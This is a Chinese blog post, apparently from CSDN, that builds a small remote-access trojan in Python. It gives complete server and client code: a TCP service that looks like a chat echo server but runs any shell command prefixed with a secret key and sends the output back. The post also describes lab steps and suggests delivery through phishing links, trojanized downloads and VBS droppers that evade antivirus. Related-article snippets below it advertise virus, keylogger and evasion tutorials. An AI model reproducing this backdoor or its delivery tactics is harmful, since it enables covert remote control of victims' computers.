基于Python/Socket实现小型的远程木马(包含实验)

最新推荐文章于 2024-02-19 14:42:24 发布
最新推荐文章于 2024-02-19 14:42:24 发布
阅读量2.3k 收藏 29
点赞数 4
文章标签: 服务器 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/BrosyveryOK/article/details/127170958
版权

| 警告:仅供参考学习,不得做违法的事!免责声明:本文仅仅只是展示攻击手段,提高防范意识。任何由于该文章产生的消极后果与本作者无关。

前言

本文是用 Python 的 Socket 模块进行的服务搭建,主要是基于TCP服务的远程木马,因此要掌握一点TCP服务搭建的知识,可以参考我的另一篇文章,结合网上搜索的知识,搭建TCP服务器和客户端,然后再进行实验。

参考文章:用Python搭建非常简易的TCP客户端和服务器_br0sy的博客-CSDN博客

还要用到 Python 的 os 模块,进行命令操作,接下去话不多说,直接开始写代码

TCP服务端代码

import socket, os
​
# 以下不写注释了,要了解原理可参考我上面的文章或自行网上搜索
def attack():
    s = socket.socket()
    try:
        s.bind(("0.0.0.0", 6666))
        s.listen()
        chanel, cilent = s.accept() # accept会造成线程阻塞,但是一般情况下不考虑这个
        while True:
            recive_content = chanel.recv(1024).decode()
            if recive_content.startswith("+=+=+"):
                # 非正常业务
                # 后门代码,key 是 +=+=+# ,后面加命令,就可以执行了
                command = recive_content.split("#")[-1]
                result = os.popen(command).read()
                # 回传信息
                chanel.send(result.encode())
            else:
                # 正常的会话(正常业务)
                print(recive_content)
                # 价值一个亿的人工智能代码↓(doge)
                response_content = recive_content.replace("吗?", "!")
                chanel.send(response_content.encode())
    except:
        # 防止服务器因报错停止
        s.close
        attack()
    
    
if __name__ == '__main__':
    attack()

TCP客户端代码

import socket
​
# 获取socket对象
s = socket.socket()
# 连接TCP服务器 下面这个ip是我的 被攻击机的ip,在下面的实验中可知
s.connect(("192.168.121.133", 6666))
while True:
    content = input("请输入要传到服务器的数据:")
    # content = "+=+=+#" + content   # 只要执行命令的话就打开这行代码,自动补充了key
    s.send(content.encode())
​
    # 传回数据
    recive_content = s.recv(10240).decode() # 这里缓冲区设置的大一点,防止回传信息过多而无法接收
    print(recive_content)

实验环境

客户端(攻击端):win10: ip:????(不需要知道)

服务端(被攻击端):Ubuntu: ip :192.168.121.132

方法

1、Ubuntu中

将TCP服务端代码放到 Ubuntu 中,并执行,就会在特定端口打开服务

如下:

开启前:在终端输入 netstat -ant 查看端口情况

现在我们开启服务:

再输入 netstat -ant 会发现 6666 端口已经开启监听

2、Win10中

在win10中,我们直接运行 客户端代码,就可以和服务器建立一个 TCP 连接,并开始传数据

于是我们可以开始干点猥琐的事情,比如....查看ip!(实在是太猥琐了)

关于如何攻击的讨论

看完上面的,你会说,别人又不傻,怎么会来执行你的脚本,不过这就涉及到社工了,总有办法的。

比如如果对方有执行代码的环境,那么也许我们可以发个邮件给别人,点开链接,进入某个我们自己写的网站,然后下载一些py程序,或者干脆下载一个应用,然后把后门放进去,由于每台windows都可以直接执行 vbs 文件,所以老旧的办法是用vbs写中间下载代码,绕过杀毒软件(免杀),然后下载真后门,不过现在好像杀毒软件都比较吊,有点难绕...以上仅是攻击讨论猜测,纯属玩笑话,看看就好。

仍存在的问题

在实验过程中,发现其实这个服务端代码写的仍然有点问题,应该是阻塞的问题,当我们在客户端中输入了错误的命令时,服务端会发生阻塞,客户端就得不到任何回显了,当然我们可以重启客户端(这是我们能做的),就可以重新发命令。

然后有的时候会莫名其妙产生BUG,估计也和操作系统有关系,不太懂了。以后学到了再回头说吧。

br0sy
关注
  • 4
    点赞
  • 29
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
python简单的病毒编程代码,如何用python写一个病毒
小发猫
07-31 4531
大家好,本文将围绕python简单的病毒编程代码展开说明,如何用python做恶搞病毒是一个很多人都想弄明白的事情,想搞清楚如何用python写一个病毒需要先了解以下几个事情。
Python编写简易木马程序
记录,总结,成长
01-28 9198
Python编写简易木马程序 0x00 准备 文章内容仅供学习研究、切勿用于非法用途! 这次我们使用Python编写一个具有键盘记录、截屏以及通信功能的简易木马。依然选用Sublime text2 +JEDI(python自动补全插件)来撸代码,安装配置JEDI插件可以参照这里: http://drops.wooyun.org/tips/4413
Python免杀技术详解
weixin_68789096的博客
11-02 1445
在网络安全领域,Shellcode加载器通常被黑客用于将Shellcode加载到目标计算机的内存中并执行它。这些加载器被安全专业人员、研究人员和安全分析师用于分析恶意软件样本中的Shellcode部分,以便了解恶意软件的行为、目的和潜在威胁。Python的灵活性和强大的库,使得Python逐渐被用于Shellcode的加载和免杀技术。我们可以利用Python中的ctypes库实现shellcode的加载,ctypes是Python的外部函数库。
Python简单木马编写
Amire0x的小乐园
03-09 4432
Python木马编写 遇到的问题和解决办法 开始是netcat.py文件,这个文件是准备模仿一部分kali工具net cat编写的 遇到了一个问题,代码写完跑不出来,脚本带参数也没法调试,通过添加print逐一排错,发现是socket中的recv函数的阻塞问题 即有两种模式阻塞与非阻塞 阻塞模式下:当缓冲区内有数据时,立即返回所有的数据;当缓冲区内无数据时,阻塞直到缓冲区中有数据。 非阻塞模式:当缓冲区内有数据时,立即返回所有的数据;当缓冲区内无数据时,产生EAGAIN的错误并返回(在Python中会抛出一
Python常见的免杀方式
m0_62207482的博客
02-09 1209
使用pyinstaller生成的可执行文件 本身就具有一定的免杀能力,但是在与杀毒软件对抗时,部分杀毒软件也可以通 过分析可执行文件的内容来判断文件是否为恶意程序,导致这些代码仍然具有被 杀的可能。·BackDoor-factory工具,又称后门工厂(BDF),利用该工具,可以在不破 坏原来的可执行文件功能的前提下,在代码中注入恶意的shellcode攻击代码。一部分杀毒软件的API拦截操作是通过对API的前几个字节内容的 监测实现的,如果跳过了头部字节,就可以避开这种拦截方式。· 未导出API。
python写一个简易的病毒
2201_75314694的博客
12-17 5984
这是一个简易的欺骗病毒,打开后好像一个下载程序,在下载完之后就强制关机,但其中有3次break的补救机会(即直接结束结束),其关机原理是命令行指令“shutdown -s -t 60”(即六十秒后关机)话不多说,上代码!
python简单病毒代码
marshmello12的博客
05-28 7187
smiley made it right=)
python简单的病毒编程代码,python杀毒软件代码
chatgpt002的博客
08-29 2318
这篇文章主要介绍了python简单的病毒编程代码,具有一定借鉴价值,需要的朋友可以参考下。希望大家阅读完这篇文章后大有收获,下面让小编带着大家一起了解一下。50次机会用完或点击”是“就会出现白屏(因为explorer进程被结束)不知道为啥,按win+Shift+S截不了图了,2、按下Ctrl+Alt+Delete组合键,选择任务管理器。点击 文件>运行新任务 输入explorer即可解决。1、强制关机重启(不建议)Python实现的小病毒。
如何用python写一个小木马
assion
03-02 1634
这个python木马更准确来说算不上是木马,只能是一个小工具,主要功能是来获取本地doc或者txt文档甚至是图片的,并把这些文档压缩直接通过FTP上传到服务器。这不禁让我想起了上学的时候,上选修课的时候,老师所讲的讲义是不会下发的,但是他的讲义全都是试题,对于一个经常翘课的我来说,上课认真听讲是不存在的。第一步、提取当前目录下png、jpg结尾的文件,注意很多图片格式还有可能是jpeg的。注意:FPT服务器的端口一定要开放,否则会出现上传失败的情况。我在想如何能“偷”到老师的试题,于是这个脚本孕育而生。
python基于socket模拟实现ssh远程执行命令
01-19
一、subprocess.Popen() subprocess模块定义了一个类: Popen 类原型: class subprocess.Popen( args, bufsize = 0, executable = None, stdin = None, stdout = None, stderr = None, preexec_fn = None, ...
基于pythonsocket实现单机五子棋到双人对战
09-19
主要为大家详细介绍了基于pythonsocket实现单机五子棋到双人对战,具有一定的参考价值,感兴趣的小伙伴们可以参考一下
Python基于socket模块实现UDP通信功能示例
12-24
本文实例讲述了Python基于socket模块实现UDP通信功能。分享给大家供大家参考,具体如下: 一 代码 1、接收端 import socket #使用IPV4协议,使用UDP协议传输数据 s=socket.socket(socket.AF_INET, socket.SOCK_...
Python socket套接字实现C/S模式远程命令执行功能案例
09-20
主要介绍了Python socket套接字实现C/S模式远程命令执行功能,涉及Python socket套接字编写服务器/客户机模式数据传输相关操作技巧,需要的朋友可以参考下
python结合邮件制作木马程序
2301_79455688的博客
08-19 1671
以上代码就是木马程序的核心,可以继续添加功能,但万不可做违法的事,下一期是一个炫酷的病毒控制端。
简单的病毒编程代码Python,利用python编写勒索病毒
热门推荐
纸尿裤排行
09-16 1万+
●介绍用QQ看电视的方法●用最简单的方法让QQ上的好友露出原形●QQ使用的七大非常规秘籍●看完这些,你就是电脑高手了●XP扮靓进行时 文件夹颜色随心换●电脑常用密码破解●保护隐私:Windows八大保密技巧●Windows操作系统快速关机之谜●恢复丢失数据的方法●连接宽带时出错表示的意思●电脑高手应用技巧荟萃●想让你的电脑键盘说话吗?2.打开我的电脑,依次打开“工具/文件夹选项/查看”,里面有一个“隐藏受保护的操作系统文件”,把前面的勾去掉,会出来一个警告窗口,选“是”。
python简单的病毒编程代码,如何用python做恶搞病毒
最新发布
K12345611717的博客
02-19 1595
def take_photoes(self): while True: time.sleep(10) # 图片路径,同时带上路径+时间 photo_path = r'%s/%s.jpeg' % (self.base_dir, time.strftime('%Y-%m-%d_%H_%M_%S')) cap = None try: # VideoCapture()中第一个参数是摄像头标号,默认情况电脑自带摄像头索引为0,外置为1.2.3…然后服务器套接字继续处于监听,接收其他客户端套接字的连接请求。
python编写木马攻击_python实现一个简单木马
weixin_39646018的博客
12-05 6029
一个简单的木马程序绝大多数的木马程序都是基于Socket实现的废话少说直接上代码!代码:client部分:# -*- coding: UTF-8 -*-import socketimport sysimport reimport osclass Client:def __init__(self, serverIp, serverPort):self.serverIp = serverIp # ...
基于python实现socket的交换机
03-28
作为一名AI语言模型,我不具备编写实际代码的能力,但我可以为您提供一些基础知识和思路,帮助您实现一个简单的socket交换机。 首先,socket是一种网络通信协议,它可以让不同的计算机之间进行数据通信。在Python中,我们可以使用socket模块来创建和管理socket对象。 要实现一个socket交换机,您需要先了解以下几点: 1. socket通信的基本流程: - 创建socket对象 - 绑定IP地址和端口号 - 监听连接请求 - 接受连接请求 - 发送和接收数据 - 关闭连接 2. 交换机的基本功能: - 接收来自客户端的请求 - 根据请求的目标地址,将数据转发到对应的服务器 - 接收服务器返回的数据,并将其转发给客户端 基于以上基本知识,您可以开始着手实现一个简单的socket交换机。以下是一些思路: 1. 创建socket对象 使用socket模块的socket()函数创建一个socket对象,指定地址族(AF_INET或AF_UNIX)、套接字类型(SOCK_STREAM或SOCK_DGRAM)和协议(默认为0)。 2. 绑定IP地址和端口号 使用socket对象的bind()方法绑定IP地址和端口号,指定监听的地址和端口。 3. 监听连接请求 使用socket对象的listen()方法开始监听连接请求,指定最大连接数。 4. 接受连接请求 使用socket对象的accept()方法接受客户端的连接请求,返回一个新的socket对象和客户端的地址信息。 5. 发送和接收数据 使用socket对象的send()方法发送数据,使用recv()方法接收数据。 6. 关闭连接 使用socket对象的close()方法关闭连接。 在实现这些基本功能之后,您还需要添加一些额外的功能,例如: - 对客户端连接进行身份验证 - 实现数据加密和解密 - 支持多个客户端同时连接 - 实现负载均衡和故障转移 总之,实现一个完整的socket交换机需要您具备一定的网络编程和Python编程经验,也需要您对网络通信协议有一定的了解。如果您是初学者,可以先从简单的示例代码入手,逐步学习和实践。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值